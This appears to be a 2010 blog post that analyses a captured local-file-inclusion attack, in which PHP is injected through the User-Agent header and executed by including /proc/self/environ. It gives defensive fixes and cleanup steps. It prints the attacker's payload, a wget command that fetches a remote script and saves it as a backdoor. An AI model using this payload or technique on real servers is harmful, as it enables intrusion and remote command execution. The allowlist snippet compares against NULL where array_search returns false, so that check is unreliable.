21 June 2010
<? exec(\"wget http://[remotescript].txt -O backdoor.php\"); ?>
This is a simplified version of what was captured in the user agent field.
What the hacker was hoping for
What we have hear is a local file injection attack coupled with injected PHP code.
The visitor hopes that my code that handles file inclusion is written something like this:
// Include file requested
Thus the file that will be included would be:
/var/www/../../proc/self/environ (which equates to /proc/self/environ)
The hacker is attempting to include the proc details about the current Apache thread. /proc/ contains information about all the running threads, /proc/self/ contains the current thread being run). Apache stores various values in the /proc/self/environ (environment variables) such as the visitors IP address, user agent, script called and other values like this:
DOCUMENT_ROOT=/var/www GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=
HTTP_HOST=www.example.com HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) PATH=/bin:/usr/bin QUERY_STRING= REMOTE_ADDR=x.x.x.x REMOTE_PORT=xxxx REQUEST_METHOD=GET REQUEST_URI=/index.php SCRIPT_FILENAME=/var/www/index.php SCRIPT_NAME=/index.php SERVER_ADDR=x.x.x.x SERVER_ADMINemail@example.com SERVER_NAME=www.example.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.1 SERVER_SIGNATURE=
However, since the hacker has set his own custom User-Agent (HTTP_USER_AGENT), that will be included and executed as PHP code. The PHP code would then execute shell commands to retrieve a remote script, download it to the server and place it in the website folder:
// Fetch remote script and place in /tmp/dump
exec("wget http://[remotescript].txt -O backdoor.php");
Now the hacker can now visit his page and run any commands he wants on your webserver.
How to prevent this
- Sanitize your inputs
- Ensure that directory traversal is disabled/checked for
- Work with an allowed list of files
$allowed_files = array('file1.php', 'file2.php');
$allowed_index = array_search($_GET['file'], $allowed_files)
if ($allowed_index !== NULL)
- Don't allow visitors to specify by name
$allowed_files = array('file1' => 'file1.php', 'file2' => 'file2.php');
Course of Action
If this has happened to you, do the following:
- Take the server offline (if possible)
- Check active process list for unknown scripts and kill them
- Patch/Fix the file inclusion vulnerability (update your web application with the latest version)
- Check your httpd/apache logs (located in either /var/log/httpd/ or /var/log/apache/ folders) for visits from the hacker to determine his IP address(es) and pinpoint which scripts he was hitting (to identify backdoors)
- Remove backdoor scripts
- Monitor you logs. The hacker will probably return and attempt to reinfect your server.